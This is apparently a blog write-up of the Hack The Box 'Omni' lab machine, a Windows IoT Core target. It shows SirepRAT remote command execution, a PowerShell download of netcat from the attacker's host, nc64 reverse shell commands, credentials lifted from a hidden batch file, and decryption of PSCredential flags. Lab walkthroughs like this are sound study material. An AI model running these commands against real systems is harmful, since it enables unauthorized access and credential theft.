Posts Omni Writeup [HTB]
Post
Cancel

Omni Writeup [HTB]

Omni is a Windows IoT machine rated as easy from Hack The Box, it consists on exploiting an RCE vulnerability to gain initial access and then using some Powershell tricks to find credentials and decrypt files.

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
nmap -sC -sV 10.10.10.204
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-08 16:50 EST
Nmap scan report for 10.10.10.204
Host is up (0.36s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
135/tcp  open  msrpc   Microsoft Windows RPC
8080/tcp open  upnp    Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Accessing port 8080 asks for credentials

Web

Researching about Windows Device Portal, we learn that the machine is running Windows 10 IoT Core.

Port 8080 corresponds to device portal, trying default creds Administrator: p@ssw0rd did not work.

Exploitation

Doing more research, a tool which allowed rce was found : SirepRAT

I confirmed the RCE was working by running the following command :

1
2
3
4
5
6
7
8
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c net user" --v
User accounts for \\

-------------------------------------------------------------------------------
Administrator            app                      DefaultAccount           
DevToolsUser             Guest                    sshd                     
WDAGUtilityAccount       
The command completed with one or more errors.

Then I decided to upload nc.exe and tried to obtain a reverse shell :

1
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -Uri http://10.10.14.44/nc.exe" --v

Unluckily this did not work

1
2
3
4
5
6
7
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -e powershell.exe 10.10.14.44 443" --v
---------
---------
This version of C:\Windows\System32\spool\drivers\color\nc.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.

---------
---------

Then, I managed to get a reverse shell by using a 64 bit version of netcat

1
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -e powershell.exe 10.10.14.44 443" --v
1
2
3
4
5
6
7
8
9
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.204] 49693
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> $env:username
$env:username
omni$

Reading user.txt we find the following :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\Data\users\app> type user.txt
type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
    </Props>
  </Obj>
</Objs>

Here we have a PSCredential in xml format, looking for a decryption way I found the following blog post

But when I ran the first command to convert from xml to a powershell object I got access denied to the path :

1
2
3
PS C:\Data\users\app> $credential = Import-CliXml -Path C:\Data\users\app    
$credential = Import-CliXml -Path C:\Data\users\app
Import-CliXml : Access to the path 'C:\Data\users\app' is denied.

After some time enumerating I decided to take profit of Powershell and looked for files containing specific windows formats, so I ran the following command :

1
PS C:\> Get-ChildItem -Force -Recurse -Include *.bat,*.vbs,*.xls,*.doc

That looked for files recursively containing those extensions and moreover it also listed hidden files.

From the output of that command I got this interesting file :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement                             
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a-h--        8/21/2020  12:56 PM            247 r.bat

PS C:\Program Files\WindowsPowershell\Modules\packagemanagement> type r.bat
type r.bat
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT

So there we have some credentials for the windows device portal, we will try first with app user.

We get a successful login and we find an utility to run commands, so we will get a new reverse shell

Web

This time we have a shell as app user

1
2
3
PS C:\windows\system32> $env:Username                                                                 
$env:Username                                                                 
app

So we can just do the whole process to decrypt the user flag

1
2
3
4
5
PS C:\Data\Users\app> $credential = Import-CliXml -Path C:\Data\Users\app\user.txt
$credential = Import-CliXml -Path C:\Data\Users\app\user.txt
PS C:\Data\Users\app> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70

Privilege Escalation

Now it is time to log in to the windows device portal with the administrator credentials . We repeat the same steps we did previously and obtain a shell as Administrator :

1
2
3
PS C:\windows\system32> $env:Username
$env:Username
Administrator

Finally we just need to get the root flag

1
2
3
4
5
PS C:\Data\Users\administrator> $credential = Import-CliXml -Path C:\Data\Users\administrator\root.txt
$credential = Import-CliXml -Path C:\Data\Users\administrator\root.txt
PS C:\Data\Users\administrator> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
This post is licensed under CC BY 4.0 by the author.